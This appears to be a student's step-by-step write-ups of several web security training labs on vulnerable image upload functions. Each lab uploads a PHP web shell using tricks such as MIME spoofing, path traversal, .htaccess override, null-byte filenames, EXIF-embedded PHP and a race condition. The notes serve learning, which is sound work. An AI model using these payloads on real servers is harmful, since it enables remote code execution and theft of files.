• About

  • This lab contains a vulnerable image upload function.
  • It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
  • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

• In Burp, go to Proxy > HTTP history. Click the filter bar to open the Filter settings dialog. Under Filter by MIME type, enable the Images checkbox, then apply your changes.

• GET

Send to Repeater

(b) Upload File

• Modify the Filename : myexploit.php

• Now Copy the Image data, select it and delete it

• Write a PHP Script

  • <?php echo file_get_contents('/home/carlos/secret'); ?>

(c) Show File

• Modify : myexploit.php

(d) Copy the Response

• Sqei0skZLQ6A06VeWa62gLhdYLbzGs53

• Now, Go to the Lab and Click : Submit Response

• Type the Copied Response

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
  • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

(b) GET

• In Burp, go to Proxy > HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>. Send this request to Burp Repeater.

• Creating : myexploit.php

  • <?php echo file_get_contents('/home/carlos/secret'); ?>

• Attempt to upload this script as your avatar.
• The response indicates that you are only allowed to upload files with the MIME type image/jpeg or image/png.

(c) POST

• In Burp, go back to the proxy history and find the POST /my-account/avatar request that was used to submit the file upload.
• Send this to Burp Repeater.

• Send the request. Observe that the response indicates that your file was successfully uploaded.

• Switch to the other Repeater tab containing the GET /files/avatars/<YOUR-IMAGE> request.

• In the path, replace the name of your image file with myexploit.php and send the request.

• Observe that Carlos's secret was returned in the response.

Carlos's Secret : ndxDHKUrUYLqj4dAnAcWIkjxbuyIbzwu

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
  • To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

(b) GET

• In Burp, go to Proxy > HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>.
• Send this request to Burp Repeater.

(c) POST

• On POST, create a file called myexploit.php, containing a script for fetching the contents of Carlos's secret.

Upload this script as your avatar. Notice that the website doesn't seem to prevent you from uploading PHP files.

• In Burp Repeater, go to the tab containing the GET /files/avatars/<YOUR-IMAGE> request.
• In the path, replace the name of your image file with myexploit.php and send the request.

Observe that instead of executing the script and returning the output, the server has just returned the contents of the PHP file as plain text.

• In Burp's proxy history, find the POST /my-account/avatar request that was used to submit the file upload and send it to Burp Repeater.

(d) POST Disposition

• In Burp Repeater, go to the tab containing the POST /my-account/avatar request

• Find the part of the request body that relates to your PHP file.

• In the Content-Disposition header, change the filename to include a directory traversal sequence

  • Content-Disposition: form-data; name="avatar"; filename="../myexploit.php"

Send the request.

Notice that the response says the file avatars/myexploit.php has been uploaded.

This suggests that the server is stripping the directory traversal sequence from the file name.

(e) Obfuscate

• Obfuscate the directory traversal sequence by URL encoding the forward slash (/) character, resulting in : filename="..%2fexploit.php"

This indicates that the file name is being URL decoded by the server.

• Now, go back to the Browser
  • Add : /files/myexploit.php?cmd=ls

• Again
  • Add : /files/myexploit.php?cmd=whoami

• Go back to the Burp Suite Proxy History

  • Select the Request Containing whoami
  • Send to Repeater

• Click : SEND

Carlos's Secret : rggsq4lH6CgJUBWBDVCPcUwlhuBQOTeb

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
  • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

(b) GET

• Send to Repeater

(c) POST

• Send to Repeater

(d) Adding PHP

• Add : <?php echo file_get_contents('/home/carlos/secret'); ?> to the POST

• Change FileName - myexploit.php

Attempt to upload this script as your avatar.

The response indicates that you are not allowed to upload files with a .php extension.

(e) Modify

• Change the value of the filename parameter to .htaccess.
• Change the value of the Content-Type header to text/plain.
• Replace PHP : AddType application/x-httpd-php .myexploit

Successfully Uploaded

(f) Go Back

• Click on the BACK ARROW

• Now Change the Filename : myexploit.myexploit

Now, it's been Uploaded Successfully

(g) Go to GET

• Change : myexploit.myexploit

• Carlos's Secret Code : kr9Pvbeol2TCnOe8trs9D3t3tBAU9Wnt

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
  • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

(b) GET

• Send to Repeater

(c) POST

• Send to Repeater

(d) Modify

• Change Filename : myexploit.php

• Add PHP : <?php echo file_get_contents('/home/carlos/secret'); ?>

Attempt to upload this script as your avatar.

The response indicates that you are only allowed to upload JPG and PNG files.

• Modify Content-Disposition : filename="myexploit.php%00.jpg"

Uploaded Successfully

(e) Go to GET

• Modify : myexploit.php

• Send
• Carlos's Secret Code : KocXh3VJU0IEsoodLD0IOXc5Zz7AVCk5

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.
  • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Create a PHP file

• Open a Terminal

• Execute the command : exiftool Screenshot360.png

(b) Create a Comment

• Execute the command : exiftool -comment="test" Screenshot360.png

• Check

(c) Update PHP File

• Execute the command : exiftool -comment="<?php echo ' LOOK HERE ' . file_get_contents('/home/carlos/secret') . ' THE SECRET IS TO THE LEFT '; ?>" Screenshot360.png

• Check

(d) Create an Image File

• Execute the Command : exiftool -comment="<?php echo ' LOOK HERE ' . file_get_contents('/home/carlos/secret') . ' THE SECRET IS TO THE LEFT '; ?>" Screenshot360.png -O myexploit.php

• Check

(e) Burp Suite Website

• Now, Go to Burp suites Default Website and Try Uploading a file for the Image

We can Observe that myexploit.php is also being considered.

• Upload it

• Click : Go back to the Home Page

(f) Burp Suite Proxy History

• Click on the GET Method - /files/avatars/myexploit.php

• We can observe the Secret Code of Carlos is printed in the Response

  • a80u728JJChFUvKP4YH6FoQNvHGrbx8R

(g) Go to the Website

• Submit Solution : a80u728JJChFUvKP4YH6FoQNvHGrbx8R

SOLVED

---

• About

  • This lab contains a vulnerable image upload function.
  • Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.
  • To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file > /home/carlos/secret.
  • Submit this secret using the button provided in the lab banner.
  • You can log in to your own account using the following credentials: wiener : peter

(a) Login

• wiener : peter

• After Logging-IN

  • Intercept it

  • Upload the Picture

• After Uploading, you'll get a page.

• Now, Click Back to My Account

  • You can observe that the Pic is Updated

(b) Proxy History

• GET Method

(c) Login

• While Uploading an IMAGE File

• While Uploading a NON-IMAGE file

Prevents you from uploading files that aren't images.

(d) Turbo Intruder

• If it's not already installed, install it from the Extensions > BApp Store > Turbo Intruder > Insall

• Now Go to Proxy History

• Click on the POST Method that contains : POST /my-account/avatar

Right Click on it > Extension > Turbo Intruder > Send to Turbo Intruder

• Page Opens

• Modify the code

(e) Attack

• On the Bottom of the Turbo Intruder Page, Click : ATTACK

When you Click : ATTACK, There will be 6 REQUESTS with different Status codes.

• Carlos's Secret Code : vvuoumtYLpJVOcdgh0afO8WN1lANJH7O

(f) Website

• Go to the Website and paste the Secret Code

SOLVED

---